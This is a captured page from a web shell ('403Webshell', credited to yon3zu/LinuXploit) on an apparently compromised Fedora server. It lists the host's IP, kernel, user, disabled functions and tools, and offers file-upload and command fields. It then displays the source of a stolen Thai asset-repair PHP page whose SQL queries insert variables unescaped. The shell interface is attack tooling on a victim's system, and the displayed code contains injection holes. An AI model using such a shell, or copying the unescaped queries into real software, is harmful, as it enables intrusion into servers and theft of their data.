403Webshell
Server IP : 182.53.201.61  /  Your IP : 216.73.217.175
Web Server : Apache/2.2.15 (Fedora)
System : Linux km10.dyndns.org 2.6.31.5-127.fc12.i686.PAE #1 SMP Sat Nov 7 21:25:57 EST 2009 i686
User : apache ( 48)
PHP Version : 5.3.3
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/backup/19062566/3/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/backup/19062566/3/testassetment.php
<?php
$ebits = ini_get('error_reporting');
error_reporting($ebits ^ E_NOTICE);
?>

<?php
include("dbconfig.php");
include( "function.php" );
$dd =date("d") ;
$mm = date("m") ;
$yy = date("Y")+543 ;
$yy2 = date("Y")+543 ;
$ndd=$dd+2 ;
		if  (!checkdate($mm,$ndd,$yy) or ($ndd < $dd) ) 
			{
				$ndd=4;
				$mm=$mm+1;
				if  ($mm==13)
				  {
					$yy=$yy+1;
					$mm=1;
				   }
			}

 $date_e = $yy."-".$mm."-".$ndd ;
//$date_e = $yy."-".$mm."-".$dd ;
$date_s =(date("Y")+543).date("-m-").(date("d")-8);  
//$date_s = formatDateDB($date_start);
//$date_e = formatDateDB($date_end);
$date_end= ($ndd-1)."-$mm-$yy" ;
$date_start = (date("d")-1).date("-m-").(date("Y")+543)   ;
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>ระบบขออนุมัติซ่อมบำรุงพัสดุ</title>
<link rel="shortcut icon" type="image/x-icon" href="/images/favicon.ico"> <!-- Icon web address bar -->
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<style>
a:link{text-decoration:none;font-family:ms sans serif;}
a:visited{text-decoration:none;font-family:ms sans serif;}
a:hover{color:red;text-decoration:none;font-family:ms sans serif;}
td{font-size:10pt;font-family:ms sans serif;}
.style2 {font-size: 18px}
.style3 {
	font-weight: bold;
	color: #3399FF;
	font-size: 20px;
}
.style4 {color: #0099FF}
.style9 {font-size: 16px}
.style10 {font-size: 16pt;
	color: #3399FF;
}
.style5 {font-family: Verdana, Arial, Helvetica, sans-serif}
.style6 {font-size: 16pt;
	color: #FFFFFF;
}
</style>
<script language="JavaScript">
<!--
function MM_swapImgRestore() { //v3.0
  var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_preloadImages() { //v3.0
  var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
    var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
    if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_findObj(n, d) { //v4.01
  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
  if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
  var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
   if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
 }
//-->
</script>
<SCRIPT language=Javascript>
var text  = " :: : ยินดีต้อนรับเข้าสู่ระบบ  : ::"
var speed = 120
var x = 0
function U() {
var a = text.substring(0,x)
var b = text.substring(x,x+1).toUpperCase()
var c = text.substring(x+1,text.length)
window.status = a + b + c
if (x == text.length) {
x = 0
}
else {
x++
}
setTimeout("U()",speed)
}
U();
--->
</SCRIPT>
</head>

<body>
<TABLE height=79 cellSpacing=0 cellPadding=0 width="100%" border=0>
  <TBODY>
    <TR> 
      <TD style="BACKGROUND-COLOR: #f0f7ff"></TD>
    </TR>
    <TR bgColor=#c7d2e7> 
      <TD height=28 bgcolor="#FFFFFF" class=thwbold><div align="center" class="style2">
        <p><span class="style2">&nbsp;</span></p>
        <p><span class="style2"><span class="style10">แสดงใบงานซ่อมเสร็จแล้วที่ยังไม่ได้ประเมิน</span></span><br>
          <br>
        </p>
      </div>        <div align="right"></div></TD>
    </TR>
    <TR> 
      <TD style="BACKGROUND-COLOR: black"></TD>
    </TR>
    <TR> 
      <TD style="BACKGROUND-COLOR: #f0f8ff"></TD>
    </TR>
    <TR vAlign=center bgColor=#216289> 
      <TD height=21 bgcolor="#00CCCC" class=thwbold> <TABLE height="95%" cellSpacing=0 cellPadding=1 width="99%" align=center 
      border=0>
          <TBODY>
            <TR> 
              <TD width="3%" height="27"  
          
          align=middle bgcolor="#00CCCC">&nbsp;</TD>
              <TD width="22%"  
          
           align=middle bgcolor="#00CCCC"><a href="follow.php" target="_parent" class="style2"><span class="style5"><font color="#FFFFFF">หน้าแรก</font></span></a><span class="style5"><span class="style6">&nbsp;</span></span><a href="pm_car_record.php" target="_blank"></a></TD>
              <TD width="9%" 
          
           align=middle bgcolor="#00CCCC"><a href="donotapprov.php" target="_blank"></a></TD>
              <TD width="23%" 
          
           align=middle bgcolor="#00CCCC"><a href="follow.php" target="_parent" class="style2"><a href="index.php" target="_parent"></a></TD>
              <TD width="23%" 
          
           align=middle bgcolor="#00CCCC"><span class="style2"><a href="rep_driver3.php" target="_parent"><font color="#FFFFFF" face="Microsoft Sans Serif, MS Sans Serif, sans-serif">ดูผลการประเมินและรายงาน</font></a></span></TD>
              <TD width="1%" 
          
         align=middle bgcolor="#00CCCC"><span class="style2"></span></TD>
              <TD width="19%"  
           align=middle bgcolor="#00CCCC" class=thtahomasmall><a href="logout.php" class="style2"><font color="#FFFFFF" face="Microsoft Sans Serif, MS Sans Serif, sans-serif">Logout 
                ออกจากระบบ</font></a></TD>
            </TR>
          </TBODY>
      </TABLE></TD>
    </TR>
    <TR> 
      <TD bgcolor="#0099FF" style="heigth: 1"></TD>
    </TR>
  </TBODY>
</TABLE>

<div align="center"><font size="4" face="Microsoft Sans Serif, MS Sans Serif, sans-serif"><br>
  ตารางแสดงการขอซ่อมระหว่างวันที่ 
  <? echo $date_start ; ?> ถึง <? echo $date_end ; ?> </font>
</div>
<table width="100%" height="115" border="1" align="center" bordercolor="#CC99CC">
  <tr background="Background6.jpg"> 
    <td width="7%" height="74" background="Background2.jpg"><div align="center" class="style9">
      <div align="center"><font face="Microsoft Sans Serif, MS Sans Serif, sans-serif">วันที่</font></div>
    </div></td>
    <td width="5%" background="Background2.jpg"><div align="center" class="style9">
      <div align="center"><font face="Microsoft Sans Serif, MS Sans Serif, sans-serif">เวลา</font></div>
    </div></td>
    <td width="31%" background="Background2.jpg"><div align="center" class="style9"><strong>พัสดุที่ต้องการซ่อม </strong></div></td>
    <td width="11%" background="Background2.jpg"><div align="center" class="style9"><strong>หมายเลขครุภัณฑ์</strong></div></td>
    <td width="18%" background="Background2.jpg"><div align="center" class="style9"><strong>รุ่น / ยี่ห้อ / อายุการใช้งาน</strong></div></td>
    <td width="8%" background="Background2.jpg"><div align="center" class="style9"><font face="Microsoft Sans Serif, MS Sans Serif, sans-serif">ผู้ขอ</font></div></td>
    <td width="10%" background="Background2.jpg"><div align="center" class="style9"><font face="Microsoft Sans Serif, MS Sans Serif, sans-serif">ช่างผู้ดำเนินงาน</font></div></td>
    <td width="10%" background="Background2.jpg"><div align="center" class="style9"><font face="Microsoft Sans Serif, MS Sans Serif, sans-serif">คาดว่าจะแล้วเสร็จใน</font></div></td>
  </tr>
  <?php	
mysql_select_db($__db__);
mysql_query(" SET NAMES 'tis620'; ");
		//$sql="select  * from tran  where  boss is not null and   date1 between '$date_s' and '$date_e' order by  date1";
		//$sql="select  * from tran  where car_id <> '0'  and date1 between '$date_s' and '$date_e' ";
		$sql="select  * from tran  where  (date1 between '$date_s' and '$date_e') and complete = 'งานซ่อมเสร็จแล้ว'  ";
		$result=mysql_query($sql) ;
		$num_rows = mysql_num_rows($result);
			
		while (@$object = mysql_fetch_object($result))
		  {
		  $date1 = $object ->date1 ;
		   $date2 = $object ->date2 ;
		  $target = $object -> target ;
		  $time1 = $object -> time1 ;
		  $time2 = $object -> time2 ;
		  $user_id = $object ->user_id;
		  $driver = $object ->driver;
		  $boss = $object ->boss;
		  $no = $object ->no;
		  $car_id = $object -> car_id;
		  $comment = $object ->comment;
		  $name = $object ->user_id;
		  $car_id2 = $object ->car_id2;
		  $assetno = $object -> assetno;
		  $brand = $object -> brand;
mysql_select_db($__dbwp__);
mysql_query(" SET NAMES 'tis620'; ");
		  $sqll="select  id,name  from user  where id = '$user_id'";
		   $lresult=mysql_query($sqll);
		   while (@$objectl = mysql_fetch_object($lresult))
	  			{
				 $name = $objectl->name;
				 }
         if (strlen($boss) > 4 )
		 {
mysql_select_db($__dbwp__);
mysql_query(" SET NAMES 'tis620'; ");
		   $bsql="select  id,name  from user  where id = '$boss'";
		   $bresult=mysql_query($bsql) or die(mysql_error());
		    while (@$bobject = mysql_fetch_object($bresult))
	  			{
				 $nameboss = $bobject->name;
				 }
			}
			$sqll="select  id,name  from user  where id = '$driver'";
		   $lresult=mysql_query($sqll);
		   while (@$objectl = mysql_fetch_object($lresult))
	  			{
				 $driver = $objectl->name;
				 }
				 	if ($date1 <  (date("Y")+543).date("-m-d") )
				 	{
				   	$bgcolor = "#ffffff" ; 
					$mover = "this.style.background='white'" ;
					$mout = "this.style.background='#ffffff'" ;
					$img = "&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"  ;
					}
					else
					{
					 $bgcolor = "#ffff99" ;
					 $mover = "this.style.background='ccccff' " ;
					 $mout = "this.style.background='#ffff99' " ;
					 $img = "<img src='../../images/gear.gif' width='22' height='22' >  " ;
					}
				?>
  
    <tr><td height="33"><div align="center"><font size="2" face="Microsoft Sans Serif, MS Sans Serif, sans-serif"> 
     <a href="reserv_sit.php?no=<? echo $no; ?>&name=<? echo $name ;?>&boss=<? echo $nameboss ;?>"> 
        <? echo formatDateshow($date1) ;?></a> </font></div></td>
    <td><div align="center"><font size="2" face="Microsoft Sans Serif, MS Sans Serif, sans-serif"><? echo $time1;?></font></div></td>
    <td><div align="center"><font size="2" face="Microsoft Sans Serif, MS Sans Serif, sans-serif"><? echo $target ;?></font></div></td>
    <td><div align="center"><font size="2" face="Microsoft Sans Serif, MS Sans Serif, sans-serif"><? echo $assetno; ?></font></div></td>
    <td><div align="center"><font size="2" face="Microsoft Sans Serif, MS Sans Serif, sans-serif"><? echo $brand; ?></font></div></td>
    <td><div align="center"><font size="2" face="Microsoft Sans Serif, MS Sans Serif, sans-serif"><? echo $name ;?></font></div></td>
    <td><div align="center"><font size="2" face="Microsoft Sans Serif, MS Sans Serif, sans-serif">
      <?
	
	 if (empty($driver)) {
	       if (!empty($comment)) {
		   echo $comment ;
		   $car_id= " " ;
		   }
		   else {
		   echo "กำลังจัดพนักงาน:ซ่อมบำรุง" ;
		   }
	 }
	 else {
	echo "<font color=\"#1A02FF\"> $driver </font>"; 
	 }
	 ?>
    </font></div></td>
    <td><div align="center"><font size="2" face="Microsoft Sans Serif, MS Sans Serif, sans-serif">
      <input name="car_id2" type="hidden" id="car_id2" value="<? echo $car_id2 ;?>">
      <input type="hidden" name="textfield2"  value="<? echo $car_id2 ; ?>" readonly="yes" >
      <? echo "<font color=\"#1A02FF\"> $car_id2 </font>"; ?></font></div></td>
  </tr>
  <?php
		  }
//	mysql_free_result($result);

			?>
</table>
<? if($num_rows == "0") echo  "<center><img src='../../images/gear.gif' width='25' height='22' ><font size='5' face='Microsoft Sans Serif, MS Sans Serif, sans-serif'>ยังไม่มีใบขออนุมัติซ่อม</font></center>"  ;?>
<blockquote> 
  <p align="left">&nbsp;</p>
</blockquote>
</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit